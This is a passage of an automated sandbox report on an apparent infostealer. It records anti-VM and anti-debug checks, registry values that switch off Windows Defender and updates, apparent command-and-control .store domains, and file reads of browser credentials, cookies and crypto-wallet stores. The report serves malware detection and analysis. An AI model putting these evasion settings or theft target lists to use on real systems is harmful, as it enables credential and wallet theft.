Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C905BC second address: 4C90657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 sub edi, edi 0x00000008 jmp 00007FDE8C51D4E5h 0x0000000d inc ebx 0x0000000e jmp 00007FDE8C51D4DEh 0x00000013 test al, al 0x00000015 pushad 0x00000016 push ecx 0x00000017 pushfd 0x00000018 jmp 00007FDE8C51D4DDh 0x0000001d or eax, 5B07C516h 0x00000023 jmp 00007FDE8C51D4E1h 0x00000028 popfd 0x00000029 pop esi 0x0000002a call 00007FDE8C51D4E1h 0x0000002f pop ebx 0x00000030 popad 0x00000031 je 00007FDE8C51D730h 0x00000037 jmp 00007FDE8C51D4DAh 0x0000003c lea ecx, dword ptr [ebp-14h] 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 movsx ebx, cx 0x00000045 call 00007FDE8C51D4E6h 0x0000004a pop eax 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90657 second address: 4C9065D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C9068B second address: 4C9068F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C9068F second address: 4C90695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90695 second address: 4C90703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push ecx 0x0000000c movsx edx, si 0x0000000f pop eax 0x00000010 call 00007FDE8C51D4DFh 0x00000015 mov ax, 92EFh 0x00000019 pop esi 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov eax, edi 0x00000021 pushfd 0x00000022 jmp 00007FDE8C51D4E3h 0x00000027 add si, 812Eh 0x0000002c jmp 00007FDE8C51D4E9h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90703 second address: 4C90713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8CE8B4CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8CEC7B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8CC502 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A7767C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: AFD6DF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Special instruction interceptor: First address: 55DC12 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Special instruction interceptor: First address: 55DD20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Special instruction interceptor: First address: 73569E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Special instruction interceptor: First address: 712B2F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Special instruction interceptor: First address: 7A662D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Memory allocated: 4D70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Memory allocated: 5030000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Memory allocated: 4D70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Code function: 3_2_006E568C rdtsc 3_2_006E568C
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe TID: 5976 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe TID: 5712 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Thread delayed: delay time: 922337203685477
Source: file.exe, file.exe, 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867405325.00000000006EB000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.1533685372.00000000055DB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696494690p
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: file.exe, file.exe, 00000000.00000002.1724509005.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724441656.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: file.exe, 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867405325.00000000006EB000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: file.exe, 00000000.00000003.1533768414.000000000569B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Code function: 3_2_006E568C rdtsc 3_2_006E568C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B0F10 LdrInitializeThunk, 0_2_008B0F10
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: file.exe String found in binary or memory: navygenerayk.store
Source: file.exe String found in binary or memory: scriptyprefej.store
Source: file.exe String found in binary or memory: necklacedmny.store
Source: file.exe String found in binary or memory: founpiuer.store
Source: file.exe String found in binary or memory: fadehairucw.store
Source: file.exe String found in binary or memory: thumbystriw.store
Source: file.exe String found in binary or memory: presticitpo.store
Source: file.exe String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 'TProgram Manager
Source: 94JSCZGRDUWCLDEBY2HC1S58YAX1.exe, 00000003.00000002.1867739547.000000000073F000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: ei>Program Manager
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Source: file.exe, 00000000.00000002.1724509005.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000D90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 4936, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\wallets
Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
Source: file.exe String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe, 00000000.00000003.1548543584.00000000055D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xtensions/ExodusWeb3nIdWRaXZ40581Z
Source: file.exe, 00000000.00000002.1724441656.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
